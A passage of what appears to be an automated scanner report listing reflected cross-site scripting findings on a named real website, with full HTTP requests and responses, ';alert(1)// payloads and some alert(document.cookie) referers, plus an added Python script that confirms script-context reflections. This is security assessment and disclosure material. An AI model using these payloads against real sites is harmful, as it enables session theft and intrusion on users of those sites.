HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 03:04:56 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 9a99d17bd50953aeb8a9e7667440422a=b8c0ada8175dc9763b9423480dc2281f; path=/
Last-Modified: Mon, 31 Jan 2011 03:04:57 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44379

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
<_kk=hadoop clouda973d';alert(1)//32229679544>
...[SNIP]...
The value of the _kt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2722'%3balert(1)//014afdd3561 was submitted in the _kt parameter. This input was echoed as d2722';alert(1)//014afdd3561 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Download/register-for-community-edition.html?_kk=hadoop%20cloud&_kt=6fcff4e0-0357-43fd-bfb8-eddd5786f223d2722'%3balert(1)//014afdd3561 HTTP/1.1
Host: www.karmasphere.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 03:05:06 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 9a99d17bd50953aeb8a9e7667440422a=075eda283f9bd2bf7906c69a8ab6bfb5; path=/
Last-Modified: Mon, 31 Jan 2011 03:05:06 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44379

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
<_kt=6fcff4e0-0357-43fd-bfb8-eddd5786f223d2722';alert(1)//014afdd3561&title=Register for Karmasphere Studio Community Edition&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurückgeben, damit das E
...[SNIP]...
3.78. http://www.karmasphere.com/Download/register-for-community-edition.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.karmasphere.com
Path: /Download/register-for-community-edition.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 806fd'%3balert(1)//5a5ba53388c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 806fd';alert(1)//5a5ba53388c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Download/register-for-community-edition.html?806fd'%3balert(1)//5a5ba53388c=1 HTTP/1.1
Host: www.karmasphere.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 03:04:48 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 9a99d17bd50953aeb8a9e7667440422a=04f5bd4abc62ba960884e2df1b55400e; path=/
Last-Modified: Mon, 31 Jan 2011 03:04:48 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44266

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
<806fd';alert(1)//5a5ba53388c=1&title=Register for Karmasphere Studio Community Edition&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurückgeben, damit das
...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0cf4'%3balert(1)//b9045904c was submitted in the REST URL parameter 1. This input was echoed as a0cf4';alert(1)//b9045904c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /componentsa0cf4'%3balert(1)//b9045904c/com_stalytics2/stalytics.php HTTP/1.1
Host: www.karmasphere.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 9a99d17bd50953aeb8a9e7667440422a=6861308c512adb0c7b9b3a1552b92e22; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; stalyticsCookie=recurrent_count_%23%3A%23_1; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.5.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND
Date: Tue, 01 Feb 2011 02:56:56 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 02:56:56 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
<= solution) { var url='http://www.karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://www.karmasphere.com/componentsa0cf4';alert(1)//b9045904c/com_stalytics2/stalytics.php&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurückgeben, damit das Event weiterve
...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5dfa3'%3balert(1)//d1f7f2977edae7d06 was submitted in the REST URL parameter 1. This input was echoed as 5dfa3';alert(1)//d1f7f2977edae7d06 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /components5dfa3'%3balert(1)//d1f7f2977edae7d06/com_stalytics2/stalytics.php??9a99d17bd50953aeb8a9e7667440422a=4aeef22ecf132868e368d212ec83389e&height=1200&width=1920&colordepth=16&plugins=Chrome PDF Viewer, Google Gears 0.5.33.0, Shockwave Flash, Java Deployment Toolkit 6.0.230.5, Java(TM) Platform SE 6 U23, WPI Detector 1.1, Google Update, Silverlight Plug-In, Default Plug-in HTTP/1.1
Host: www.karmasphere.com
Proxy-Connection: keep-alive
Referer: http://www.karmasphere.com/Downloadfd9f9'%3balert(document.cookie)//50f1acaf291/register-for-community-edition.html
Origin: http://www.karmasphere.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 9a99d17bd50953aeb8a9e7667440422a=4aeef22ecf132868e368d212ec83389e; stalyticsCookie=recurrent_count_%23%3A%23_1
Response
HTTP/1.1 404 NOT FOUND
Date: Tue, 01 Feb 2011 02:55:09 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 02:55:10 GMT
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
<= solution) { var url='http://www.karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://www.karmasphere.com/components5dfa3';alert(1)//d1f7f2977edae7d06/com_stalytics2/stalytics.php??9a99d17bd50953aeb8a9e7667440422a=4aeef22ecf132868e368d212ec83389e>
...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 362ec'%3balert(1)//1a1e70ae29a5f42d9 was submitted in the REST URL parameter 2. This input was echoed as 362ec';alert(1)//1a1e70ae29a5f42d9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /components/com_stalytics2362ec'%3balert(1)//1a1e70ae29a5f42d9/stalytics.php??9a99d17bd50953aeb8a9e7667440422a=4aeef22ecf132868e368d212ec83389e&height=1200&width=1920&colordepth=16&plugins=Chrome PDF Viewer, Google Gears 0.5.33.0, Shockwave Flash, Java Deployment Toolkit 6.0.230.5, Java(TM) Platform SE 6 U23, WPI Detector 1.1, Google Update, Silverlight Plug-In, Default Plug-in HTTP/1.1 Host: www.karmasphere.com Proxy-Connection: keep-alive Referer: http://www.karmasphere.com/Downloadfd9f9'%3balert(document.cookie)//50f1acaf291/register-for-community-edition.html Origin: http://www.karmasphere.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 9a99d17bd50953aeb8a9e7667440422a=4aeef22ecf132868e368d212ec83389e; stalyticsCookie=recurrent_count_%23%3A%23_1
Response
HTTP/1.1 404 NOT FOUND Date: Tue, 01 Feb 2011 02:56:56 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" X-Content-Encoded-By: Joomla! 1.5 Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 02:56:56 GMT Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://www.karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://www.karmasphere.com/components/com_stalytics2362ec';alert(1)//1a1e70ae29a5f42d9/stalytics.php??9a99d17bd50953aeb8a9e7667440422a=4aeef22ecf132868e368d212ec83389e> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75355'%3balert(1)//4be87ff6666 was submitted in the REST URL parameter 2. This input was echoed as 75355';alert(1)//4be87ff6666 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /components/com_stalytics275355'%3balert(1)//4be87ff6666/stalytics.php HTTP/1.1 Host: www.karmasphere.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 9a99d17bd50953aeb8a9e7667440422a=6861308c512adb0c7b9b3a1552b92e22; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; stalyticsCookie=recurrent_count_%23%3A%23_1; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.5.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND Date: Tue, 01 Feb 2011 03:00:04 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 03:00:05 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34832
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://www.karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://www.karmasphere.com/components/com_stalytics275355';alert(1)//4be87ff6666/stalytics.php&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarbeitet wird ...[SNIP]...
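Confirming a script-context reflection by hand, as an added example that is not part of the scanner report: the Python below takes a response body and the random prefix of a submitted probe, finds every reflection, and runs a small JavaScript lexer over the enclosing <script> block to decide whether the probe landed inside an open single-quoted string literal and came back with its apostrophe intact, which is exactly the condition the findings above describe. The response bodies it runs against are constructed stand-ins modelled on the captured 404 page; the hm_trackClick function name, the <p> echo of the path and the style.php body are assumptions, and the lexer deliberately does not model JS regex literals.

```python
"""Manual confirmation of a reflected-XSS finding from a captured response.

Locate every reflection of the scanner's random prefix in the body, work out
the syntactic context at that point (HTML text, or, inside a <script> block,
JS code / comment / open string literal), and check whether the full
URL-decoded probe was reflected verbatim there.  A verbatim reflection inside
an open single-quoted JS string is the reported condition: the probe's
apostrophe closes the literal and the remainder runs as code.
"""
import re

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)


def script_ranges(body):
    """(start, end) offsets of the contents of every <script> element."""
    return [(m.start(1), m.end(1)) for m in SCRIPT_RE.finditer(body)]


def js_context_at(script, offset):
    """Minimal JS lexer: the state at `offset` is 'code', 'line_comment',
    'block_comment' or "string:<quote>".  Regex literals are not modelled,
    which is sufficient for the straight-line tracker code in the report."""
    i, state, quote = 0, "code", None
    while i < offset:
        c = script[i]
        if state == "code":
            if c in "'\"`":
                state, quote = "string", c
            elif script.startswith("//", i):
                state, i = "line_comment", i + 1
            elif script.startswith("/*", i):
                state, i = "block_comment", i + 1
        elif state == "string":
            if c == "\\":
                i += 1                       # skip the escaped character
            elif c == quote:
                state, quote = "code", None
            elif c == "\n" and quote != "`":
                state, quote = "code", None  # unterminated literal: syntax error, treat as code
        elif state == "line_comment":
            if c == "\n":
                state = "code"
        elif state == "block_comment":
            if script.startswith("*/", i):
                state, i = "code", i + 1
        i += 1
    return f"string:{quote}" if state == "string" else state


def assess_reflections(body, prefix):
    """[(offset, context)] for every occurrence of `prefix` in `body`.
    Context is 'html' outside scripts, otherwise 'js:' + js_context_at()."""
    scripts = script_ranges(body)
    out = []
    for m in re.finditer(re.escape(prefix), body):
        pos, ctx = m.start(), "html"
        for s, e in scripts:
            if s <= pos < e:
                ctx = "js:" + js_context_at(body[s:e], pos - s)
                break
        out.append((pos, ctx))
    return out


def confirmed(body, prefix, payload, expected_ctx):
    """True when the URL-decoded `payload` is reflected unmodified at a point
    whose context is `expected_ctx` (e.g. "js:string:'" or "html")."""
    return any(ctx == expected_ctx and body.startswith(payload, pos)
               for pos, ctx in assess_reflections(body, prefix))


# Constructed stand-in for the 404 page in the report: the script mirrors the
# captured heat-map tracker statement; the <p> echo of the path is assumed.
SAMPLE_404 = """<html><head><script type="text/javascript">
function hm_trackClick(clickX, clickY, solution, itemid) {
  var url='http://www.karmasphere.com/components/com_stalytics2/trackHeat.php';
  var data = 'url=http://www.karmasphere.com/components/com_stalytics275355';alert(1)//4be87ff6666/stalytics.php&title=__404__&x='+clickX+'&y='+clickY;
  hm_sendClickAjaxReq(url, data);
}
</script></head>
<body><p>Not found: /components/com_stalytics275355';alert(1)//4be87ff6666/stalytics.php</p></body></html>"""
JS_PROBE = "75355';alert(1)//4be87ff6666"   # URL-decoded form of the submitted payload

# Constructed stand-in for style.php echoing the arrows parameter as HTML text.
SAMPLE_CSS = "<html><body>Unknown arrows image: style1.pngb5d83<img src=a onerror=alert(1)>4f4823ddc4c</body></html>"
HTML_PROBE = "b5d83<img src=a onerror=alert(1)>4f4823ddc4c"

if __name__ == "__main__":
    for pos, ctx in assess_reflections(SAMPLE_404, "75355"):
        print(f"offset {pos}: {ctx}")
    print("JS string break-out confirmed:", confirmed(SAMPLE_404, "75355", JS_PROBE, "js:string:'"))
    print("HTML tag injection confirmed:", confirmed(SAMPLE_CSS, "b5d83", HTML_PROBE, "html"))
```

To check a real finding, replace SAMPLE_404 with the saved response body and pass the five-character random token from the report as the prefix. A context of js:string:' together with a verbatim match is the confirmation; a reflection whose apostrophe comes back as \' or \u0027 fails the verbatim check and is a false positive for this context even though the token itself is echoed.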
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ff6d'%3balert(1)//c9280cd0b5b was submitted in the REST URL parameter 3. This input was echoed as 8ff6d';alert(1)//c9280cd0b5b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /components/com_stalytics2/8ff6d'%3balert(1)//c9280cd0b5b HTTP/1.1 Host: www.karmasphere.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 9a99d17bd50953aeb8a9e7667440422a=6861308c512adb0c7b9b3a1552b92e22; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; stalyticsCookie=recurrent_count_%23%3A%23_1; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.5.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND Date: Tue, 01 Feb 2011 03:00:55 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 03:00:56 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34806
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://www.karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://www.karmasphere.com/components/com_stalytics2/8ff6d';alert(1)//c9280cd0b5b&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarbeitet wird return tru ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3281a'%3balert(1)//e1e418071b4 was submitted in the REST URL parameter 1. This input was echoed as 3281a';alert(1)//e1e418071b4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /modules3281a'%3balert(1)//e1e418071b4/mod_sp_news_highlighter/assets/css/style.php?width=900&height=25&uniqid=1&arrows=style1.png&linkcolor=047aac&linkhover=039ee1 HTTP/1.1 Host: www.karmasphere.com Proxy-Connection: keep-alive Referer: http://www.karmasphere.com/Downloadfd9f9'%3balert(document.cookie)//50f1acaf291/register-for-community-edition.html Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 9a99d17bd50953aeb8a9e7667440422a=4aeef22ecf132868e368d212ec83389e; stalyticsCookie=recurrent_count_%23%3A%23_1
Response
HTTP/1.1 404 NOT FOUND Date: Tue, 01 Feb 2011 02:53:04 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" X-Content-Encoded-By: Joomla! 1.5 Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 02:53:05 GMT Content-Type: text/html; charset=utf-8 Content-Length: 34954
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://www.karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://www.karmasphere.com/modules3281a';alert(1)//e1e418071b4/mod_sp_news_highlighter/assets/css/style.php?width=900> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b00d'%3balert(1)//c76778a4791 was submitted in the REST URL parameter 2. This input was echoed as 7b00d';alert(1)//c76778a4791 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /modules/mod_sp_news_highlighter7b00d'%3balert(1)//c76778a4791/assets/css/style.php HTTP/1.1 Host: www.karmasphere.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 9a99d17bd50953aeb8a9e7667440422a=6861308c512adb0c7b9b3a1552b92e22; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; stalyticsCookie=recurrent_count_%23%3A%23_1; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.5.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND Date: Tue, 01 Feb 2011 02:58:08 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 02:58:09 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34858
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://www.karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://www.karmasphere.com/modules/mod_sp_news_highlighter7b00d';alert(1)//c76778a4791/assets/css/style.php&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, damit das Event weiterverarbeite ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4ce4'%3balert(1)//2450813036d was submitted in the REST URL parameter 3. This input was echoed as c4ce4';alert(1)//2450813036d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /modules/mod_sp_news_highlighter/assetsc4ce4'%3balert(1)//2450813036d/css/style.php?width=900&height=25&uniqid=1&arrows=style1.png&linkcolor=047aac&linkhover=039ee1 HTTP/1.1 Host: www.karmasphere.com Proxy-Connection: keep-alive Referer: http://www.karmasphere.com/Downloadfd9f9'%3balert(document.cookie)//50f1acaf291/register-for-community-edition.html Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 9a99d17bd50953aeb8a9e7667440422a=4aeef22ecf132868e368d212ec83389e; stalyticsCookie=recurrent_count_%23%3A%23_1
Response
